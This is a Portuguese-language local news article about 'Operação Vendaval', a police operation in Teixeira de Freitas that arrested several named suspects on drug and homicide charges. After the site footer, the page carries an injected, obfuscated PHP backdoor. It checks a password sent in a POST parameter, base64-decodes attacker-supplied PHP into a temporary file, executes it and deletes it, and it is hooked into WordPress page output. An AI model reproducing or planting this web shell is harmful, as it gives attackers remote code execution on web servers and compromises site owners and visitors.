• SEJA BEM-VINDO

Operação Vendaval: Polícia Civil e Militar cumprem mandados e prendem diversos acusados de crimes em vários bairros

Publicado em: 09/08/2022 Atualizado:: agosto 9, 2022

 

A Operação Vendaval aconteceu na manhã desta terça-feira, 09 de agosto, nos Bairros Ulisses Guimarães, Colina Verde, São Lourenço, Santa Rita, Nova América, Liberdade I e Castelinho, tendo como alvo específico, o Bairro João Mendonça. A Operação Vendaval contou com o apoio da Policiais Civis da 8ª COORPIN, e da Companhia Independente da Polícia Militar (87ª CIPM).

 

De acordo com o delegado plantonista, Marcos Ludovico, em conversa com o Liberdade News, ele relatou que a Polícia Civil intensificou as investigações em relação às organizações criminosas que estão atuando na cidade de Teixeira de Freitas e conseguiu com êxito localizar alguns alvos, e na manhã desta terça-feira (09), em operação com a Polícia Militar, realizaram as prisões, que foram determinadas pelo Judiciário.

 

Foram vários mandados de prisões, e de buscas de apreensão a líderes de organização criminosa, envolvendo tráfico de drogas, homicídios, furtos e roubos patrimoniais, furtos e roubos de veículos, comercio de arma de fogo e diversos outros crimes. “Foram realizadas, também, várias buscas e apreensões de drogas, que estavam com essas pessoas. Vamos buscar a quebra de sigilo das contas bancárias destes traficantes, e dar sequência aos trabalhos de investigação, na intenção de coibir o crime”, explicou o delegado.

 

 

“Essas pessoas estão presas por determinação judicial. Vamos fazer a comunicação ao Judiciário, acerca da prisão dessas pessoas, e vamos continuar com o nosso trabalho investigativo”, acrescentou.

Os mandados de prisão cumpridos foram de Felipe dos Santos Nogueira, de 20 anos, vulgo “Dick Vigarista” (tráfico de drogas); Uerle de Brito Krygsman, de 23 anos, vulgo “Desenho” (homicídio e associação ao tráfico); Carlos Henrique Rodrigues Pereira (tráfico de drogas); Ângelo Messias Ramos Mendes (tráfico de drogas); João Lucas da Silva Batista, (tráfico de drogas) e João Paulo Dias Fernandes (tráfico de drogas).

 

Todos seguem presos na custódia da Polícia Civil de Teixeira de Freitas, à disposição da Justiça. “Nossa operação envolveu 03 (três) guarnições da Polícia Civil e 04 (quatro) da Policia Militar. Pedimos a todos, que se por algum motivo tiver alguma denúncia, ligar para a Polícia Militar (190) ou Polícia Civil (197). Sua ligação terá sigilo total”, finalizou o delegado Marcos Ludovico.

 

………………

 

Fonte: Liberdadenews

 


JORNAL INDEPENDENTE


Siga as redes sociais

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}